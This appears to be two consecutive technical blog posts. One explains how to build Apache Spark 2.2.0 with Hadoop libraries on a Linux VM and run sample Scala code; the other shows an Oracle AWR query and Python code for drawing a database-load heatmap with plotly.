Until now, I usually used it directly on Hadoop clusters, but each time I had to play with Spark without needing a complete Hadoop cluster, or to test some basic pieces of code … it became hard to do, especially on my laptop! Running a 3-node CDH cluster on your laptop requires CPU and memory!

So in this post, I decided to describe how you can set up a small Linux virtual machine and install the latest Spark version in standalone mode.

First of all, you need a fully working Linux box … I chose Oracle Enterprise Linux 7.4 with a 3.8.13-118 UEK kernel.

[spark@spark ~]$ sudo uname -r
3.8.13-118.19.4.el7uek.x86_64

Once the box is installed and configured, you need to install Java. In my case, I installed a Java SE 8 JDK:

[spark@spark ~]$ sudo yum localinstall /home/spark/jdk-8u121-linux-x64.rpm -y
[spark@spark ~]$ java -version
java version "1.8.0_121"
Java(TM) SE Runtime Environment (build 1.8.0_121-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)

Then, create the directories required for the Spark installation and download the sources (if you need another version of Spark, you will find it at this URL: https://spark.apache.org/downloads.html):

[spark@spark ~]$ sudo mkdir /usr/local/share/spark
[spark@spark ~]$ sudo chown spark:spark /usr/local/share/spark
[spark@spark ~]$ curl -O https://d3kbcqa49mib13.cloudfront.net/spark-2.2.0.tgz
[spark@spark ~]$ tar -xvzf spark-2.2.0.tgz -C /usr/local/share/spark/
[spark@spark ~]$ cd /usr/local/share/spark/spark-2.2.0/

If you are behind a proxy server, you have to create a settings.xml file in the $HOME/.m2 directory (you’ll probably have to create it). You have to do it even if you have set the http_proxy variable in your environment, because Maven, which is used during the build, takes its proxy configuration from this file.

Below, you’ll see what my settings.xml file looks like:

[spark@spark ~]$ cat ~/.m2/settings.xml
<settings>
 <proxies>
 <proxy>
 <id>example-proxy</id>
 <active>true</active>
 <protocol>http</protocol>
 <host>10.239.9.20</host>
 <port>80</port>
 </proxy>
 </proxies>
</settings>

Then, you are ready to configure the Maven environment and launch the build:

[spark@spark ~]$ cd /usr/local/share/spark/spark-2.2.0/
[spark@spark spark-2.2.0]$ export MAVEN_OPTS="-Xmx2g -XX:ReservedCodeCacheSize=512m"
[spark@spark spark-2.2.0]$ ./build/mvn -DskipTests clean package

At the end of the process, a summary report is printed.

[spark@spark spark-2.2.0]$ ./build/mvn -DskipTests clean package

.../...

[INFO] Replacing original artifact with shaded artifact.
[INFO] Replacing /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0.jar with /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-shaded.jar
[INFO] Dependency-reduced POM written at: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/dependency-reduced-pom.xml
[INFO]
[INFO] --- maven-source-plugin:3.0.1:jar-no-fork (create-source-jar) @ spark-streaming-kafka-0-10-assembly_2.11 ---
[INFO] Building jar: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-sources.jar
[INFO]
[INFO] --- maven-source-plugin:3.0.1:test-jar-no-fork (create-source-jar) @ spark-streaming-kafka-0-10-assembly_2.11 ---
[INFO] Building jar: /usr/local/share/spark/spark-2.2.0/external/kafka-0-10-assembly/target/spark-streaming-kafka-0-10-assembly_2.11-2.2.0-test-sources.jar
[INFO] ------------------------------------------------------------------------
[INFO] Reactor Summary:
[INFO]
[INFO] Spark Project Parent POM ........................... SUCCESS [01:04 min]
[INFO] Spark Project Tags ................................. SUCCESS [ 26.598 s]
[INFO] Spark Project Sketch ............................... SUCCESS [ 6.316 s]
[INFO] Spark Project Networking ........................... SUCCESS [ 17.129 s]
[INFO] Spark Project Shuffle Streaming Service ............ SUCCESS [ 6.836 s]
[INFO] Spark Project Unsafe ............................... SUCCESS [ 9.039 s]
[INFO] Spark Project Launcher ............................. SUCCESS [ 21.286 s]
[INFO] Spark Project Core ................................. SUCCESS [02:24 min]
[INFO] Spark Project ML Local Library ..................... SUCCESS [ 20.021 s]
[INFO] Spark Project GraphX ............................... SUCCESS [ 13.117 s]
[INFO] Spark Project Streaming ............................ SUCCESS [ 33.581 s]
[INFO] Spark Project Catalyst ............................. SUCCESS [01:22 min]
[INFO] Spark Project SQL .................................. SUCCESS [02:56 min]
[INFO] Spark Project ML Library ........................... SUCCESS [02:08 min]
[INFO] Spark Project Tools ................................ SUCCESS [ 3.084 s]
[INFO] Spark Project Hive ................................. SUCCESS [ 51.106 s]
[INFO] Spark Project REPL ................................. SUCCESS [ 4.365 s]
[INFO] Spark Project Assembly ............................. SUCCESS [ 2.109 s]
[INFO] Spark Project External Flume Sink .................. SUCCESS [ 8.062 s]
[INFO] Spark Project External Flume ....................... SUCCESS [ 9.350 s]
[INFO] Spark Project External Flume Assembly .............. SUCCESS [ 2.087 s]
[INFO] Spark Integration for Kafka 0.8 .................... SUCCESS [ 12.043 s]
[INFO] Kafka 0.10 Source for Structured Streaming ......... SUCCESS [ 12.758 s]
[INFO] Spark Project Examples ............................. SUCCESS [ 19.236 s]
[INFO] Spark Project External Kafka Assembly .............. SUCCESS [ 5.637 s]
[INFO] Spark Integration for Kafka 0.10 ................... SUCCESS [ 9.345 s]
[INFO] Spark Integration for Kafka 0.10 Assembly .......... SUCCESS [ 3.909 s]
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 14:54 min
[INFO] Finished at: 2017-09-14T12:22:31+02:00
[INFO] Final Memory: 86M/896M
[INFO] ------------------------------------------------------------------------

At this point, if you run a script, you’ll get an error: even with Spark installed in standalone mode, you still need the Hadoop libraries.

That’s easy to fix: we just have to download Hadoop and configure our environment as shown below. Download the Hadoop version you need; I chose 2.8, which is the latest stable version for Hadoop 2. I didn’t test with Hadoop 3 as it’s still in beta:

[spark@spark ~]$ cd /usr/local/share/
[spark@spark share]$ sudo mkdir hadoop
[spark@spark share]$ sudo chown spark:spark hadoop/
[spark@spark share]$ cd hadoop/
[spark@spark hadoop]$ curl -O http://apache.mirrors.ovh.net/ftp.apache.org/dist/hadoop/common/hadoop-2.8.1/hadoop-2.8.1.tar.gz
[spark@spark hadoop]$ tar -xzf hadoop-2.8.1.tar.gz
[spark@spark hadoop]$ cat >> ~/.bashrc
export HADOOP_HOME=/usr/local/share/hadoop/hadoop-2.8.1
export LD_LIBRARY_PATH=${HADOOP_HOME}/lib/native:${LD_LIBRARY_PATH}
export SPARK_HOME=/usr/local/share/spark/spark-2.2.0
export PATH=${SPARK_HOME}/bin:${PATH}
[spark@spark hadoop]$ . ~/.bashrc
[spark@spark hadoop]$ env | egrep 'HADOOP|PATH|SPARK'
SPARK_HOME=/usr/local/share/spark/spark-2.2.0
HADOOP_HOME=/usr/local/share/hadoop/hadoop-2.8.1
LD_LIBRARY_PATH=/usr/local/share/hadoop/hadoop-2.8.1/lib/native:/usr/local/share/hadoop/hadoop-2.8.1/lib/native:
PATH=/usr/local/share/spark/spark-2.2.0/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/spark/.local/bin:/home/spark/bin

Now, we can run the SparkPi example:

[spark@spark ~]$ run-example SparkPi 500
Pi is roughly 3.141360702827214

Note: If you want to remove all those crappy INFO messages in the output, run the command below to configure log4j properties:

[spark@spark hadoop]$ cd $SPARK_HOME/conf
[spark@spark conf]$ sed 's/log4j\.rootCategory=INFO, console/log4j\.rootCategory=WARN, console/g' log4j.properties.template > log4j.properties

 

That’s done: you’re now ready to run your code on Spark. Below is a sample written in Scala that creates a DataFrame from an Oracle JDBC data source and runs a groupBy on it.

[spark@spark ~]$ spark-shell --driver-class-path ojdbc7.jar --jars ojdbc7.jar
Spark context Web UI available at http://192.168.99.14:4040
Spark context available as 'sc' (master = local[*], app id = local-1505397247969).
Spark session available as 'spark'.
Welcome to
      ____              __
     / __/__  ___ _____/ /__
    _\ \/ _ \/ _ `/ __/  '_/
   /___/ .__/\_,_/_/ /_/\_\   version 2.2.0
      /_/

Using Scala version 2.11.8 (Java HotSpot(TM) 64-Bit Server VM, Java 1.8.0_121)
Type in expressions to have them evaluated.
Type :help for more information.

scala> :load jdbc_sample.scala
Loading jdbc_sample.scala...
import java.util.Properties
connProps: java.util.Properties = {}
res0: Object = null
res1: Object = null
df: org.apache.spark.sql.DataFrame = [PROD_ID: decimal(6,0), PROD_NAME: string ... 20 more fields]

scala> df.printSchema
root
 |-- PROD_ID: decimal(6,0) (nullable = false)
 |-- PROD_NAME: string (nullable = false)
 |-- PROD_DESC: string (nullable = false)
 |-- PROD_SUBCATEGORY: string (nullable = false)
 |-- PROD_SUBCATEGORY_ID: decimal(38,10) (nullable = false)
 |-- PROD_SUBCATEGORY_DESC: string (nullable = false)
 |-- PROD_CATEGORY: string (nullable = false)
 |-- PROD_CATEGORY_ID: decimal(38,10) (nullable = false)
 |-- PROD_CATEGORY_DESC: string (nullable = false)
 |-- PROD_WEIGHT_CLASS: decimal(3,0) (nullable = false)
 |-- PROD_UNIT_OF_MEASURE: string (nullable = true)
 |-- PROD_PACK_SIZE: string (nullable = false)
 |-- SUPPLIER_ID: decimal(6,0) (nullable = false)
 |-- PROD_STATUS: string (nullable = false)
 |-- PROD_LIST_PRICE: decimal(8,2) (nullable = false)
 |-- PROD_MIN_PRICE: decimal(8,2) (nullable = false)
 |-- PROD_TOTAL: string (nullable = false)
 |-- PROD_TOTAL_ID: decimal(38,10) (nullable = false)
 |-- PROD_SRC_ID: decimal(38,10) (nullable = true)
 |-- PROD_EFF_FROM: timestamp (nullable = true)
 |-- PROD_EFF_TO: timestamp (nullable = true)
 |-- PROD_VALID: string (nullable = true)

scala> df.groupBy("PROD_CATEGORY").count.show
+--------------------+-----+
|       PROD_CATEGORY|count|
+--------------------+-----+
|      Software/Other|   26|
|               Photo|   10|
|         Electronics|   13|
|Peripherals and A...|   21|
|            Hardware|    2|
+--------------------+-----+

And … that’s it … have fun with Spark 😉

 

Database Load heatmap with AWR and Python

Recently, one of my customers asked me to design a tool to quickly see the database load. He had already done that for another RDBMS with a heatmap.

To do that, I split my work into two distinct parts: data extraction and data visualization.

Data Extraction from AWR

As he has licensed his databases with the Diagnostic Pack, I decided to use the AWR repository. And as I’m a bit lazy, I took a query from Marcin Przepiorowski (@pioro) and modified it to pivot the data.


col "00-01_ " for 90.99
col "01-02_ " for 90.99
col "02-03_ " for 90.99
col "03-04_ " for 90.99
col "04-05_ " for 90.99
col "05-06_ " for 90.99
col "06-07_ " for 90.99
col "07-08_ " for 90.99
col "08-09_ " for 90.99
col "09-10_ " for 90.99
col "10-11_ " for 90.99
col "11-12_ " for 90.99
col "12-13_ " for 90.99
col "13-14_ " for 90.99
col "14-15_ " for 90.99
col "15-16_ " for 90.99
col "16-17_ " for 90.99
col "17-18_ " for 90.99
col "18-19_ " for 90.99
col "19-20_ " for 90.99
col "20-21_ " for 90.99
col "21-22_ " for 90.99
col "22-23_ " for 90.99
col "23-24_ " for 90.99

WITH t AS
  (SELECT TO_CHAR(mtime,'YYYY/MM/DD') mtime,
    TO_CHAR(mtime,'HH24') d,
    LOAD AS value
  FROM
    (SELECT to_date(mtime,'YYYY-MM-DD HH24') mtime,
      ROUND(SUM(c1),2) AAS_WAIT,
      ROUND(SUM(c2),2) AAS_CPU,
      ROUND(SUM(cnt),2) AAS,
      ROUND(SUM(load),2) LOAD
    FROM
      (SELECT TO_CHAR(sample_time,'YYYY-MM-DD HH24') mtime,
        DECODE(session_state,'WAITING',COUNT(*),0)/360 c1,
        DECODE(session_state,'ON CPU',COUNT( *),0) /360 c2,
        COUNT(                               *)/360 cnt,
        COUNT(                               *)/360/cpu.core_nb load
      FROM dba_hist_active_sess_history,
        (SELECT value AS core_nb FROM v$osstat WHERE stat_name='NUM_CPU_CORES'
        ) cpu
      WHERE sample_time > sysdate - 30
      GROUP BY TO_CHAR(sample_time,'YYYY-MM-DD HH24'),
        session_state,
        cpu.core_nb
      )
    GROUP BY mtime
    )
  )
SELECT mtime,
  NVL("00-01_ ",0) "00-01_ ",
  NVL("01-02_ ",0) "01-02_ ",
  NVL("02-03_ ",0) "02-03_ ",
  NVL("03-04_ ",0) "03-04_ ",
  NVL("04-05_ ",0) "04-05_ ",
  NVL("05-06_ ",0) "05-06_ ",
  NVL("06-07_ ",0) "06-07_ ",
  NVL("07-08_ ",0) "07-08_ ",
  NVL("08-09_ ",0) "08-09_ ",
  NVL("09-10_ ",0) "09-10_ ",
  NVL("10-11_ ",0) "10-11_ ",
  NVL("11-12_ ",0) "11-12_ ",
  NVL("12-13_ ",0) "12-13_ ",
  NVL("13-14_ ",0) "13-14_ ",
  NVL("14-15_ ",0) "14-15_ ",
  NVL("15-16_ ",0) "15-16_ ",
  NVL("16-17_ ",0) "16-17_ ",
  NVL("17-18_ ",0) "17-18_ ",
  NVL("18-19_ ",0) "18-19_ ",
  NVL("19-20_ ",0) "19-20_ ",
  NVL("20-21_ ",0) "20-21_ ",
  NVL("21-22_ ",0) "21-22_ ",
  NVL("22-23_ ",0) "22-23_ ",
  NVL("23-24_ ",0) "23-24_ "
FROM t pivot( SUM(value) AS " " FOR d IN ('00' AS "00-01",'01' AS "01-02",'02' AS "02-03",'03' AS "03-04",'04' AS "04-05",'05' AS "05-06",'06' AS "06-07",'07' AS "07-08",
                                          '08' AS "08-09",'09' AS "09-10",'10' AS "10-11", '11' AS "11-12",'12' AS "12-13",'13' AS "13-14",'14' AS "14-15",'15' AS "15-16",
                                          '16' AS "16-17",'17' AS "17-18",'18' AS "18-19",'19' AS "19-20",'20' AS "20-21",'21' AS "21-22", '22' AS "22-23",'23' AS "23-24") 
            )
ORDER BY mtime

Note: this query can be used to extract the database load, the Average Active Sessions (AAS), the CPU part of AAS, or the wait part of AAS. You just have to change which column is aliased as value in the WITH block (LOAD, AAS, AAS_CPU or AAS_WAIT).

Another point, I didn’t look at the plan, so I didn’t tune the statement … if you have some tricks to tune it … feel free to comment 😉
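To make the arithmetic of the query concrete, here is a small Python sketch of what the inner SELECT computes for one hour. It assumes that dba_hist_active_sess_history keeps one sample every 10 seconds per active session, which gives 360 samples per hour and explains the /360 divisor. The function name and the sample figures are made up for illustration; they do not come from the query or from my customer’s database.

```python
# One persisted ASH sample every 10 seconds (assumption) => 3600 / 10 = 360 per hour.
SAMPLES_PER_HOUR = 360


def hourly_metrics(waiting_samples, on_cpu_samples, cpu_cores):
    """Return (aas_wait, aas_cpu, aas, load) for one hour, rounded to 2 decimals.

    Mirrors the AAS_WAIT, AAS_CPU, AAS and LOAD columns of the query:
    a sample count divided by 360 is an average number of active sessions,
    and dividing that by the number of CPU cores gives the load.
    """
    total_samples = waiting_samples + on_cpu_samples
    aas_wait = waiting_samples / SAMPLES_PER_HOUR
    aas_cpu = on_cpu_samples / SAMPLES_PER_HOUR
    aas = total_samples / SAMPLES_PER_HOUR
    load = aas / cpu_cores
    return tuple(round(v, 2) for v in (aas_wait, aas_cpu, aas, load))


# Hypothetical hour: 540 samples in WAITING, 900 samples ON CPU, 4 cores.
print(hourly_metrics(540, 900, 4))
```

With these made-up figures, an average of 4 sessions were active during the hour on a 4-core server, so the load is 1.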

This query gives this kind of result:

MTIME      00-01_  01-02_  02-03_  03-04_  04-05_  05-06_  06-07_  07-08_  08-09_  09-10_  10-11_  11-12_  12-13_  13-14_  14-15_  15-16_  16-17_  17-18_  18-19_  19-20_  20-21_  21-22_  22-23_  23-24_
---------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- ------- -------
2016/11/23    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.03    0.03    0.00    0.04    0.02    0.00    0.00    0.04    0.01    0.01    0.01    0.04    0.01
2016/11/24    0.02    0.03    0.01    0.03    0.05    0.02    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/06    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.01    0.01    0.02    0.02    0.00    0.00    0.00    0.00
2016/12/07    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.01    0.00    0.00    0.04    0.03    0.01    0.02    0.01    0.02    0.01    0.01    0.06    0.03
2016/12/08    0.03    0.05    0.02    0.02    0.03    0.03    0.02    0.02    0.03    0.02    0.01    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/12    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.03    0.02    0.05    0.02
2016/12/13    0.03    0.01    0.01    0.01    0.02    0.03    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00
2016/12/14    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.00    0.02    0.02    0.02    0.02    0.18    0.03    0.02    0.01    0.01    0.00    0.00    0.00    0.00    0.00

When the result is greater than 1, your database is loaded, and if it’s greater than or equal to 2, it’s really overloaded. In both cases, you have to analyze why.
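These thresholds are easy to apply programmatically. The sketch below is only an illustration: the labels, the function names and the sample row are hypothetical, and the load values are invented so that both thresholds are hit.

```python
def classify_load(load):
    """Label a load value with the thresholds described above."""
    if load >= 2:
        return "overloaded"
    if load > 1:
        return "loaded"
    return "ok"


def hours_to_investigate(day, hourly_loads):
    """Return (day, hour_range, load, label) for each hour whose load is above 1.

    hourly_loads holds the 24 values of one result row, from 00-01 to 23-24.
    """
    flagged = []
    for hour, load in enumerate(hourly_loads):
        label = classify_load(load)
        if label != "ok":
            hour_range = "{:02d}-{:02d}".format(hour, hour + 1)
            flagged.append((day, hour_range, load, label))
    return flagged


# Hypothetical day: quiet except between 14:00 and 16:00.
sample_row = [0.0] * 14 + [1.18, 2.0] + [0.0] * 8
for entry in hours_to_investigate("2016/12/14", sample_row):
    print(entry)
```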

The problem with this kind of result is that it’s only numbers, and you have to read the complete output to detect when a problem occurs. Here comes the data visualization part 😉

Data Visualization with Python

In the Oracle database area, one guy has done a lot for the visualization of performance data: Kyle Hailey (@dbavigil). Visualizing your data is very important to quickly identify bottlenecks. So if you’re interested in data visualization, you can visit his blog; you will find a lot of resources to extract AWR data and visualize it (and other stuff).

So I decided to use Python to visualize the database load data extracted previously. To do that, I used Python 3.4.5 with a bunch of packages installed:

  • cx_Oracle to connect to the Oracle database and execute queries on it
  • numpy for arrays manipulation
  • plotly to graph the heatmap

The Python script is available at this URL: https://app.box.com/s/irjzi64lbne6xhw3t57aixqiy95toxht. You then have to modify it to enter your connection string (line 33).

My customer asked for the script to generate an HTML file so that the heatmap can be viewed in a browser (one of the reasons I used plotly).

The script generates the file in /var/tmp (you can change this at the end of the script) and then opens the browser locally (so don’t forget to export the X11 display if you run it on a Linux server).

Below you can see the heatmap (the X axis is the hour range, the Y axis represents the days analyzed, and the most recent day is on the first line of the heatmap).

[Image: heatmap_s]
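If you prefer to start from scratch rather than from my script, the layout described above can be sketched as follows. This is not the script linked earlier, only a minimal illustration: the function names, the output file name and the sample rows are hypothetical, and it assumes the rows come back from the query as tuples (MTIME followed by the 24 hourly values). Only the second function needs plotly; it uses go.Heatmap and plotly.offline.plot, and forces a categorical, reversed Y axis so that the first row (the most recent day) is drawn at the top.

```python
def build_heatmap_inputs(rows):
    """Turn query rows (mtime, v00, ..., v23) into (x, y, z) for a heatmap.

    x: the 24 hour ranges, y: the days with the most recent first,
    z: one list of 24 floats per day, in the same order as y.
    """
    x = ["{:02d}-{:02d}".format(h, h + 1) for h in range(24)]
    # MTIME is formatted YYYY/MM/DD, so sorting the strings sorts the dates.
    ordered = sorted(rows, key=lambda row: row[0], reverse=True)
    y = [row[0] for row in ordered]
    z = [[float(v) for v in row[1:25]] for row in ordered]
    return x, y, z


def write_heatmap_html(rows, filename="/var/tmp/heatmap.html"):
    """Write the heatmap to an HTML file (requires the plotly package)."""
    import plotly.graph_objs as go
    from plotly.offline import plot

    x, y, z = build_heatmap_inputs(rows)
    layout = go.Layout(
        title="Database load",
        # Treat the days as categories and put the first row at the top.
        yaxis=dict(type="category", autorange="reversed"),
    )
    figure = go.Figure(data=[go.Heatmap(z=z, x=x, y=y)], layout=layout)
    plot(figure, filename=filename, auto_open=False)


# Two hypothetical days with made-up values, in the order the query returns them.
rows = [
    ("2016/11/23",) + (0.0,) * 11 + (0.03,) * 2 + (0.0,) * 11,
    ("2016/11/24",) + (0.02, 0.03, 0.01) + (0.0,) * 21,
]
x, y, z = build_heatmap_inputs(rows)
print(y)
print(x[0], x[-1])
```

Calling write_heatmap_html(rows) with the rows fetched through cx_Oracle would then produce the HTML file; set auto_open=True if you want the browser to open automatically.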

This heatmap will help my customer quickly visualize his database load. I hope it will help you too ;).

Of course, you can use the tool of your choice to visualize data (Tableau, Excel, Kibana etc.)